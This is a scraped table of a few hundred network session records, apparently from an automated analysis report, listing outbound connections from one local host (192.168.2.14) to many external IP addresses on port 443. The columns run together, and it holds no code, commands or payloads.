                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10115192.168.2.144755692.153.97.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10116192.168.2.1442230149.108.170.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10117192.168.2.1442842190.42.229.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10118192.168.2.1438912123.43.93.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10119192.168.2.1458528178.162.254.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10120192.168.2.1437340189.16.155.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10121192.168.2.1457216104.85.227.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10122192.168.2.144643271.177.21.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10123192.168.2.1460366186.170.49.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10124192.168.2.1442932217.144.204.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10125192.168.2.1433126207.36.147.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10126192.168.2.144274080.89.63.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10127192.168.2.1453962221.124.126.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10128192.168.2.145551465.222.146.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10129192.168.2.1454380172.74.3.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10130192.168.2.1437560189.106.69.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10131192.168.2.1454628161.255.159.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10132192.168.2.1451942122.225.23.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10133192.168.2.1436156159.176.248.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10134192.168.2.145408679.126.25.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10135192.168.2.1436494203.10.89.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10136192.168.2.144945271.90.219.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10137192.168.2.1452624136.250.114.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10138192.168.2.1454062139.187.233.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10139192.168.2.1459816223.201.210.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10140192.168.2.1441672174.219.184.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10141192.168.2.1458396103.171.241.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10142192.168.2.144793678.28.194.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10143192.168.2.1459408190.69.96.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10144192.168.2.144557613.250.110.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10145192.168.2.145735639.198.176.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10146192.168.2.1443412213.36.128.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10147192.168.2.144344850.136.70.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10148192.168.2.143354892.183.133.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10149192.168.2.145357063.156.108.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10150192.168.2.1455210207.85.81.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10151192.168.2.1449380108.227.138.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10152192.168.2.1443310157.167.186.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10153192.168.2.144493827.115.7.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10154192.168.2.144044842.201.200.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10155192.168.2.1447414217.109.215.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10156192.168.2.1448986134.142.98.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10157192.168.2.144670670.250.130.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10158192.168.2.145374494.22.61.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10159192.168.2.1459964184.230.173.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10160192.168.2.146049893.223.123.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10161192.168.2.1434478161.182.64.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10162192.168.2.1442092119.228.70.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10163192.168.2.1453568163.103.14.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10164192.168.2.1453160141.173.18.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10165192.168.2.145993876.113.173.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10166192.168.2.1433436156.148.151.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10167192.168.2.1444082176.201.144.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10168192.168.2.1453028203.245.224.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10169192.168.2.1450958109.69.182.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10170192.168.2.144175877.215.151.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10171192.168.2.143759076.112.195.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10172192.168.2.1437152159.155.132.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10173192.168.2.1453830145.90.159.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10174192.168.2.143726448.177.131.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10175192.168.2.1457482139.223.24.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10176192.168.2.1438280222.131.5.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10177192.168.2.1453778179.128.200.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10178192.168.2.1432810213.26.215.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10179192.168.2.144444658.208.49.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10180192.168.2.1435744156.143.217.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10181192.168.2.145516460.170.107.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10182192.168.2.1452516100.6.111.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10183192.168.2.14481509.62.54.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10184192.168.2.1434186190.58.14.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10185192.168.2.144949867.178.19.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10186192.168.2.1451856179.148.158.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10187192.168.2.145916285.253.5.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10188192.168.2.1456090130.24.236.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10189192.168.2.1458022210.131.34.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10190192.168.2.1457590128.134.54.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10191192.168.2.1459000119.116.190.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10192192.168.2.1456832192.70.123.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10193192.168.2.143538086.5.150.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10194192.168.2.145760880.28.121.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10195192.168.2.1440882139.146.227.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10196192.168.2.1451112212.162.104.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10197192.168.2.1441084107.3.120.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10198192.168.2.1456702186.231.179.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10199192.168.2.144193423.182.238.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10200192.168.2.143852273.176.70.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10201192.168.2.145872660.193.26.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10202192.168.2.14403909.191.17.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10203192.168.2.144101446.36.188.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10204192.168.2.1460228222.167.31.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10205192.168.2.1454540172.181.214.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10206192.168.2.1435040168.61.68.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10207192.168.2.1455144206.66.114.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10208192.168.2.1456644206.197.216.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10209192.168.2.1440138136.214.228.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10210192.168.2.1436900129.246.112.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10211192.168.2.1443022145.104.69.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10212192.168.2.1450098123.33.210.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10213192.168.2.1438926209.74.195.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10214192.168.2.1456562197.113.97.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10215192.168.2.1445268125.53.176.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10216192.168.2.145717479.223.40.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10217192.168.2.14461229.181.134.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10218192.168.2.1437960213.140.86.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10219192.168.2.1434438168.252.233.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10220192.168.2.145461489.41.131.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10221192.168.2.143863423.87.162.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10222192.168.2.1447182172.219.118.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10223192.168.2.145445070.24.124.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10224192.168.2.1457820223.49.162.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10225192.168.2.1449272117.82.156.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10226192.168.2.1458746124.218.208.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10227192.168.2.1459794177.95.37.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10228192.168.2.143631076.228.104.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10229192.168.2.1454862185.134.33.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10230192.168.2.1459088178.247.85.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10231192.168.2.1435546177.141.55.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10232192.168.2.144117895.168.42.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10233192.168.2.1449032104.10.83.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10234192.168.2.144853253.254.104.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10235192.168.2.144736243.28.68.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10236192.168.2.143585276.187.30.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10237192.168.2.1441016191.86.74.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10238192.168.2.145109453.249.143.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10239192.168.2.1436412157.217.59.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10240192.168.2.145627069.202.249.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10241192.168.2.1460758175.226.93.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10242192.168.2.1457344104.233.216.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10243192.168.2.144677894.108.203.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10244192.168.2.1433526222.215.80.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10245192.168.2.1451408130.170.103.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10246192.168.2.1445936188.20.101.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10247192.168.2.145482661.214.59.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10248192.168.2.1445648200.123.50.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10249192.168.2.1459470184.175.99.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10250192.168.2.1433022200.127.12.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10251192.168.2.1458226188.194.241.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10252192.168.2.1452792113.52.101.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10253192.168.2.1455102116.38.195.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10254192.168.2.144905691.91.192.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10255192.168.2.145248458.205.103.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10256192.168.2.145033620.202.221.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10257192.168.2.1438180164.141.242.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10258192.168.2.144756489.13.63.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10259192.168.2.144094850.181.4.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10260192.168.2.1434444220.61.83.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10261192.168.2.1439114189.90.181.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10262192.168.2.1438524193.17.148.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10263192.168.2.1448464158.141.196.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10264192.168.2.1457370111.12.251.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10265192.168.2.145225247.144.157.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10266192.168.2.1440738141.188.99.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10267192.168.2.1460148121.50.121.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10268192.168.2.143885662.198.93.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10269192.168.2.1456972148.241.84.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10270192.168.2.144127624.87.185.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10271192.168.2.143296037.2.74.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10272192.168.2.1457270173.146.188.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10273192.168.2.1440064131.56.100.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10274192.168.2.1443490137.193.253.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10275192.168.2.1457960106.203.163.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10276192.168.2.1454676154.28.141.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10277192.168.2.14452369.48.110.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10278192.168.2.144467071.159.102.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10279192.168.2.1433734112.225.198.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10280192.168.2.1449392194.250.234.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10281192.168.2.145111865.166.152.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10282192.168.2.1445504143.33.107.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10283192.168.2.1446222160.81.224.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10284192.168.2.1436682181.60.49.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10285192.168.2.1456778102.158.131.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10286192.168.2.145190853.59.1.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10287192.168.2.144196298.110.151.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10288192.168.2.1455706153.97.71.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10289192.168.2.144062483.252.157.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10290192.168.2.145970485.54.169.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10291192.168.2.146034054.54.110.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10292192.168.2.1456246211.23.186.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10293192.168.2.1456968136.3.54.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10294192.168.2.1433230165.69.146.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10295192.168.2.143351057.44.71.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10296192.168.2.1446456222.87.185.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10297192.168.2.1449524173.39.69.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10298192.168.2.1457712111.41.59.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10299192.168.2.1436220133.195.184.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10300192.168.2.143868441.104.108.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10301192.168.2.1460046191.166.34.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10302192.168.2.145522279.174.142.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10303192.168.2.1438844168.123.97.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10304192.168.2.145808089.178.7.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10305192.168.2.1457326132.112.70.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10306192.168.2.1437156117.247.152.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10307192.168.2.1436002175.140.226.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10308192.168.2.1443582207.229.110.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10309192.168.2.1444442114.168.133.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10310192.168.2.1433568180.217.62.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10311192.168.2.1436884190.19.229.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10312192.168.2.143823641.83.227.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10313192.168.2.143483234.242.139.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10314192.168.2.1432860188.96.179.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10315192.168.2.1436198161.146.221.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10316192.168.2.143397461.180.238.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10317192.168.2.1452922114.237.183.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10318192.168.2.1447888192.31.236.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10319192.168.2.143470890.227.231.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10320192.168.2.144449263.43.140.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10321192.168.2.1440010128.36.58.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10322192.168.2.1436918177.53.191.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10323192.168.2.1452762177.189.213.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10324192.168.2.1455842132.194.0.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10325192.168.2.143605098.114.159.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10326192.168.2.144183424.133.217.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10327192.168.2.145855427.65.49.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10328192.168.2.1434688107.103.93.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10329192.168.2.1459282218.101.70.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10330192.168.2.143625450.135.168.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10331192.168.2.1456772221.146.120.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10332192.168.2.144913252.19.93.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10333192.168.2.1444232164.64.66.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10334192.168.2.1453970114.226.4.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10335192.168.2.1442680152.8.50.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
